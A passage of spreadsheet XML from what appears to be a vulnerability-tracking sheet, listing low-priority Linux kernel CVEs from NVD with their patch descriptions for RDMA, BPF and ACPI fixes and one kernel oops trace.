      <c r="T837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92508</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92509</t>
        </is>
      </c>
      <c r="D838" s="5" t="inlineStr"/>
      <c r="E838" s="5" t="inlineStr"/>
      <c r="F838" s="5" t="inlineStr"/>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="inlineStr"/>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q838" s="5" t="inlineStr"/>
      <c r="R838" s="5" t="inlineStr"/>
      <c r="S838" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in counter_release()
When accessing a counter via the netlink path the only synchronization
mechanism for the said counter is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
counter_release(), which is too late, since by that point
vendor-specific resources associated with the counter might already be
freed. This can leave a short window where the counter remains
accessible through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_del() call to be before the
freeing of the vendor-specific resources, ensuring that the counter is
removed from restrack before its internal resources are released.
This guarantees that no new users hold references to a counter that is
in the process of destruction.</t>
        </is>
      </c>
      <c r="T838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92509</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92510</t>
        </is>
      </c>
      <c r="D839" s="5" t="inlineStr"/>
      <c r="E839" s="5" t="inlineStr"/>
      <c r="F839" s="5" t="inlineStr"/>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="inlineStr"/>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q839" s="5" t="inlineStr"/>
      <c r="R839" s="5" t="inlineStr"/>
      <c r="S839" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_destroy_srq_user()
When accessing a SRQ via the netlink path the only synchronization
mechanism for the said SRQ is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_destroy_srq_user(), which is too late, since by that point
vendor-specific resources associated with the SRQ might already be
freed. This can leave a short window where the SRQ remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_begin_del() call to the start of
ib_destroy_srq_user(), ensuring that the SRQ is removed from restrack
before its internal resources are released. This guarantees that no new
users hold references to a SRQ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839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92510</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92511</t>
        </is>
      </c>
      <c r="D840" s="5" t="inlineStr"/>
      <c r="E840" s="5" t="inlineStr"/>
      <c r="F840" s="5" t="inlineStr"/>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="inlineStr"/>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q840" s="5" t="inlineStr"/>
      <c r="R840" s="5" t="inlineStr"/>
      <c r="S840" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_destroy_cq_user()
When accessing a CQ via the netlink path the only synchronization
mechanism for the said CQ is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_destroy_cq_user(), which is too late, since by that point
vendor-specific resources associated with the CQ might already be
freed. This can leave a short window where the CQ remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_begin_del() call to the start of
ib_destroy_cq_user(), ensuring that the CQ is removed from restrack
before its internal resources are released. This guarantees that no new
users hold references to a CQ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840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92511</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92512</t>
        </is>
      </c>
      <c r="D841" s="5" t="inlineStr"/>
      <c r="E841" s="5" t="inlineStr"/>
      <c r="F841" s="5" t="inlineStr"/>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="inlineStr"/>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr"/>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q841" s="5" t="inlineStr"/>
      <c r="R841" s="5" t="inlineStr"/>
      <c r="S841" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix use after free in ib_query_qp()
When querying a QP via the netlink flow the only synchronization
mechanism for the said QP is rdma_restrack_get(), meanwhile during the
QP destroy path rdma_restrack_del() is called at the end of the
ib_destroy_qp_user() function which is too late, since by then the
vendor specific resources for said QP would already be destroyed, and
till the rdma_restrack_del() is called this QP can still be accessed,
which could cause the use after free below.
Fix this by moving the rdma_restrack_begin_del() to the start of the
ib_destroy_qp_user(), which in turn waits for all usages of the QP to be
done then removes it from the database to prevent access to it while it
is being destroyed.
RIP: 0010:ib_query_qp+0x15/0x50 [ib_core]
Code: 48 83 05 5d 8e b9 ff 01 eb b5 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 c7 46 40 00 00 00 00 48 c7 46 78 00 00 00 00 &lt;48&gt; 8b 07 48 8b 80 88 01 00 00 48 85 c0 74 1a 48 83 05 54 91 b9 ff
RSP: 0018:ff11000108a8f2f0 EFLAGS: 00010202
RAX: 0000000000000000 RBX: ff11000108a8f370 RCX: ff11000108a8f370
RDX: 0000000000000000 RSI: ff11000108a8f3d8 RDI: 0000000000000000
RBP: ff1100010de5a000 R08: 0000000000000e80 R09: 0000000000000004
R10: ff110001057a604c R11: 0000000000000000 R12: ff11000108a8f370
R13: ff110001090e8000 R14: 0000000000000000 R15: ff110001057a602c
FS:  00007f2ffd8db6c0(0000) GS:ff110008dc90b000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 000000010b9a7004 CR4: 0000000000373eb0
Call Trace:
 &lt;TASK&gt;
 mlx5_ib_gsi_query_qp+0x21/0x50 [mlx5_ib]
 mlx5_ib_query_qp+0x689/0x9d0 [mlx5_ib]
 ib_query_qp+0x35/0x50 [ib_core]
 fill_res_qp_entry_query.isra.0+0x47/0x280 [ib_core]
 ? __wake_up+0x40/0x50
 ? netlink_broadcast_filtered+0x15a/0x550
 ? kobject_uevent_env+0x562/0x710
 ? ep_poll_callback+0x242/0x270
 ? __nla_put+0xc/0x20
 ? nla_put+0x28/0x40
 ? nla_put_string+0x2e/0x40 [ib_core]
 fill_res_qp_entry+0x138/0x190 [ib_core]
 res_get_common_dumpit+0x4a5/0x800 [ib_core]
 ? fill_res_qp_entry_query.isra.0+0x280/0x280 [ib_core]
 nldev_res_get_qp_dumpit+0x1e/0x30 [ib_core]
 netlink_dump+0x16f/0x450
 __netlink_dump_start+0x1ce/0x2e0
 rdma_nl_rcv_msg+0x1d3/0x330 [ib_core]
 ? nldev_res_get_qp_raw_dumpit+0x30/0x30 [ib_core]
 rdma_nl_rcv_skb.constprop.0.isra.0+0x108/0x180 [ib_core]
 rdma_nl_rcv+0x12/0x20 [ib_core]
 netlink_unicast+0x255/0x380
 ? __alloc_skb+0xfa/0x1e0
 netlink_sendmsg+0x1f3/0x420
 __sock_sendmsg+0x38/0x60
 ____sys_sendmsg+0x1e8/0x230
 ? copy_msghdr_from_user+0xea/0x170
 ___sys_sendmsg+0x7c/0xb0
 ? __futex_wait+0x95/0xf0
 ? __futex_wake_mark+0x40/0x40
 ? futex_wait+0x67/0x100
 ? futex_wake+0xac/0x1b0
 __sys_sendmsg+0x5f/0xb0
 do_syscall_64+0x55/0xb90
 entry_SYSCALL_64_after_hwframe+0x4b/0x53</t>
        </is>
      </c>
      <c r="T841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92512</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92513</t>
        </is>
      </c>
      <c r="D842" s="5" t="inlineStr"/>
      <c r="E842" s="5" t="inlineStr"/>
      <c r="F842" s="5" t="inlineStr"/>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="inlineStr"/>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr"/>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q842" s="5" t="inlineStr"/>
      <c r="R842" s="5" t="inlineStr"/>
      <c r="S842" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana_ib: drain QP references after partial table insertion
mana_table_store_ud_qp() publishes a QP at its send-queue id before
inserting the receive-queue id, dropping the XArray lock between the two
xa_insert_irq() calls. A concurrent completion handler can look up the QP
and take a transient reference. When the second insertion fails, the
rollback erased only the send-queue entry and returned, leaving both the
initial table reference and the transient reference outstanding while RDMA
core frees the QP, causing a use-after-free.
Drain the reference as normal destruction does: drop the initial reference
and wait for qp-&gt;free, releasing the QP only after every concurrent lookup
returns its reference.</t>
        </is>
      </c>
      <c r="T842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92513</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92514</t>
        </is>
      </c>
      <c r="D843" s="5" t="inlineStr"/>
      <c r="E843" s="5" t="inlineStr"/>
      <c r="F843" s="5" t="inlineStr"/>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="inlineStr"/>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr"/>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q843" s="5" t="inlineStr"/>
      <c r="R843" s="5" t="inlineStr"/>
      <c r="S843" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Fix CEQ tasklet use-after-free on removal
Each CEQ interrupt handler only schedules eqc-&gt;tasklet. The tasklet calls
erdma_ceq_completion_handler(), which reads the DMA-coherent EQ ring
through get_next_valid_eqe() and updates eq-&gt;dbrec through notify_eq().
erdma_ceqs_uninit() frees each CEQ IRQ and then destroys its EQ.
free_irq() prevents another hard IRQ and waits for an in-flight handler,
but it does not drain a tasklet that the handler already scheduled. The
tasklet can therefore access eq-&gt;qbuf or eq-&gt;dbrec after
erdma_eq_destroy() frees them.
Clearing ceq_cb-&gt;ready does not synchronize with a tasklet that already
passed the check at the start of erdma_ceq_completion_handler().
Kill the tasklet after free_irq(), when no handler can schedule it again,
and before erdma_ceq_uninit_one() releases the EQ buffers.</t>
        </is>
      </c>
      <c r="T843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92514</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92515</t>
        </is>
      </c>
      <c r="D844" s="5" t="inlineStr"/>
      <c r="E844" s="5" t="inlineStr"/>
      <c r="F844" s="5" t="inlineStr"/>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="inlineStr"/>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q844" s="5" t="inlineStr"/>
      <c r="R844" s="5" t="inlineStr"/>
      <c r="S844" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Preserve unique-field state across nested structs
btf_find_struct_field() initializes a fresh seen mask for every recursive
descent. Unique special fields in different levels of the same aggregate
therefore do not see one another. The duplicate fields can reach
btf_parse_fields(), where they trigger an invariant WARN_ON_ONCE(). A
crafted user BTF can consequently trigger the warning before map creation
checks capabilities.
Initialize the seen mask once in btf_find_field() and pass the same pointer
through struct, datasec, and nested-struct walks. This gives the entire field
traversal one shared uniqueness state.</t>
        </is>
      </c>
      <c r="T844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92515</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92516</t>
        </is>
      </c>
      <c r="D845" s="5" t="inlineStr"/>
      <c r="E845" s="5" t="inlineStr"/>
      <c r="F845" s="5" t="inlineStr"/>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="inlineStr"/>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr"/>
      <c r="L845" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q845" s="5" t="inlineStr"/>
      <c r="R845" s="5" t="inlineStr"/>
      <c r="S845" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix offset warn check for bpf_res_spin_lock
Sashiko pointed out correctly that the case statement for
BPF_RES_SPIN_LOCK incorrectly checks offset for BPF_SPIN_LOCK.
Fix it by checking res_spin_lock_off instead.</t>
        </is>
      </c>
      <c r="T845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92516</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92517</t>
        </is>
      </c>
      <c r="D846" s="5" t="inlineStr"/>
      <c r="E846" s="5" t="inlineStr"/>
      <c r="F846" s="5" t="inlineStr"/>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="inlineStr"/>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q846" s="5" t="inlineStr"/>
      <c r="R846" s="5" t="inlineStr"/>
      <c r="S846" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, riscv: Fix extable handling for arena load_acquire
emit_atomic_ld_st() returns 1 to have build_body() skip the zext after
a sub-word load_acquire. The caller does "ret = ret ?:
add_exception_handler(...)", which skips add_exception_handler() on any
non-zero ret, so the extable entry is missing and a faulting
PROBE_ATOMIC load_acquire oopses.
REG_DONT_CLEAR_MARKER leaves rd stale on fault, and the verifier still
thinks the load overwrote it, so a program can leak it through a map.
Check ret &gt;= 0 before calling add_exception_handler(), and pass rd for
LOAD_ACQ so the fault zeroes rd like a PROBE_MEM load. Return ret
unchanged for the zext skip.</t>
        </is>
      </c>
      <c r="T846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92517</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92518</t>
        </is>
      </c>
      <c r="D847" s="5" t="inlineStr"/>
      <c r="E847" s="5" t="inlineStr"/>
      <c r="F847" s="5" t="inlineStr"/>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="inlineStr"/>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q847" s="5" t="inlineStr"/>
      <c r="R847" s="5" t="inlineStr"/>
      <c r="S847" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
riscv, bpf: Fix kernel stack corruption in tailcall with CFI
When CONFIG_CFI_CLANG is enabled, prog-&gt;bpf_func already skips the kcfi
instruction during setup. Including it again in the tailcall jump offset
causes it to jump over an extra 4 bytes, skipping the stack pointer
adjustment, which will result in kernel stack corruption.</t>
        </is>
      </c>
      <c r="T847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92518</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92519</t>
        </is>
      </c>
      <c r="D848" s="5" t="inlineStr"/>
      <c r="E848" s="5" t="inlineStr"/>
      <c r="F848" s="5" t="inlineStr"/>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="inlineStr"/>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q848" s="5" t="inlineStr"/>
      <c r="R848" s="5" t="inlineStr"/>
      <c r="S848" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
riscv, bpf: Fix memory leak in bpf_jit_free
When bpf_int_jit_compile() is called for subprograms, it returns early
during the first pass (!prog-&gt;is_func || extra_pass is false), keeping
ctx-&gt;offset alive for the subsequent extra pass.
If JIT compilation fails for a later subprogram, the BPF core aborts
and calls bpf_jit_free() to clean up the first subprogram. However,
bpf_jit_free() fails to free jit_data-&gt;ctx.offset, which causes a
memory leak of the JIT context offsets array.
Fix this by adding the missing kfree(jit_data-&gt;ctx.offset) in
bpf_jit_free().</t>
        </is>
      </c>
      <c r="T848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92519</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92520</t>
        </is>
      </c>
      <c r="D849" s="5" t="inlineStr"/>
      <c r="E849" s="5" t="inlineStr"/>
      <c r="F849" s="5" t="inlineStr"/>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="inlineStr"/>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr"/>
      <c r="K849" s="5" t="inlineStr"/>
      <c r="L849" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q849" s="5" t="inlineStr"/>
      <c r="R849" s="5" t="inlineStr"/>
      <c r="S849" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Zero queue and stack outputs on lock failure
Queue and stack pop/peek helpers accept an uninitialized output buffer
because the verifier expects the helper to initialize it. The empty-map
error path clears the buffer, but a failed lock acquisition returns
-EBUSY without writing it.
Clear the output before returning -EBUSY so BPF programs cannot observe
uninitialized stack contents after a failed helper call.</t>
        </is>
      </c>
      <c r="T849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92520</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92521</t>
        </is>
      </c>
      <c r="D850" s="5" t="inlineStr"/>
      <c r="E850" s="5" t="inlineStr"/>
      <c r="F850" s="5" t="inlineStr"/>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="inlineStr"/>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr"/>
      <c r="L850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q850" s="5" t="inlineStr"/>
      <c r="R850" s="5" t="inlineStr"/>
      <c r="S850" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: PCI: Clear driver_data on all paths that free the acpi_pci_root
acpi_pci_root_add() assigns the freshly allocated root to
device-&gt;driver_data before dmar_device_add() and pci_acpi_scan_root().
Both failure paths reach the end: label where root is kfree()'d, but
only the pci_acpi_scan_root() path clears driver_data first.
When dmar_device_add() fails during a hot-add, root is freed while
device-&gt;driver_data still points at it.  The ACPI core does not clear
driver_data on attach failure, so a later acpi_pci_find_root() call may
dereference this dangling pointer.
acpi_pci_root_remove() has the same problem: it frees root without
clearing device-&gt;driver_data, leaving a dangling pointer behind after
the root bridge is removed.
Move the NULL assignment to the shared end: label so every error path in
acpi_pci_root_add() clears driver_data before freeing root, and clear it
in acpi_pci_root_remove() as well, so the object is never left reachable
through driver_data after being freed.</t>
        </is>
      </c>
      <c r="T850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92521</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92522</t>
        </is>
      </c>
      <c r="D851" s="5" t="inlineStr"/>
      <c r="E851" s="5" t="inlineStr"/>
      <c r="F851" s="5" t="inlineStr"/>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="inlineStr"/>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q851" s="5" t="inlineStr"/>
      <c r="R851" s="5" t="inlineStr"/>
      <c r="S851" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: processor: validate MADT IOAPIC entry bounds
The IOAPIC hotplug lookup parses both MADT and _MAT records directly.
The MADT walk previously used a subtable's declared length to advance
the cursor after only locating a generic header.  The _MAT path likewise
passed a generic header to the IOAPIC helper.
Validate that a current record has a complete generic header, that its
declared length is contained in the available record range, and that a
typed IOAPIC record contains the full fixed IOAPIC body before reading
its fields.  Use the same relation for both MADT and _MAT provider
paths.</t>
        </is>
      </c>
      <c r="T851" s="6" t="inlineStr">
        <is>
